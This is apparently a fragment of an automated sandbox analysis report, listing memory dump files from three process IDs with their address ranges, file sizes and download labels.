memory/3848-27-0x0000000002AF0000-0x0000000002B12000-memory.dmp

Filesize
136KB

Download
memory/3848-21-0x00007FFD4F073000-0x00007FFD4F075000-memory.dmp

Filesize
8KB

Download
memory/3848-18-0x0000000000130000-0x000000000019C000-memory.dmp

Filesize
432KB

Download
memory/3848-33-0x00007FFD4F070000-0x00007FFD4FB31000-memory.dmp

Filesize
10.8MB

Download
memory/3848-103-0x00007FFD4F070000-0x00007FFD4FB31000-memory.dmp

Filesize
10.8MB

Download
memory/3948-114-0x0000000140000000-0x00000001400D8000-memory.dmp

Filesize
864KB

Download
memory/4032-192-0x0000000000030000-0x0000000000042000-memory.dmp

Filesize
72KB

Download
memory/4032-193-0x00000000008F0000-0x00000000008F6000-memory.dmp

Filesize
24KB

Download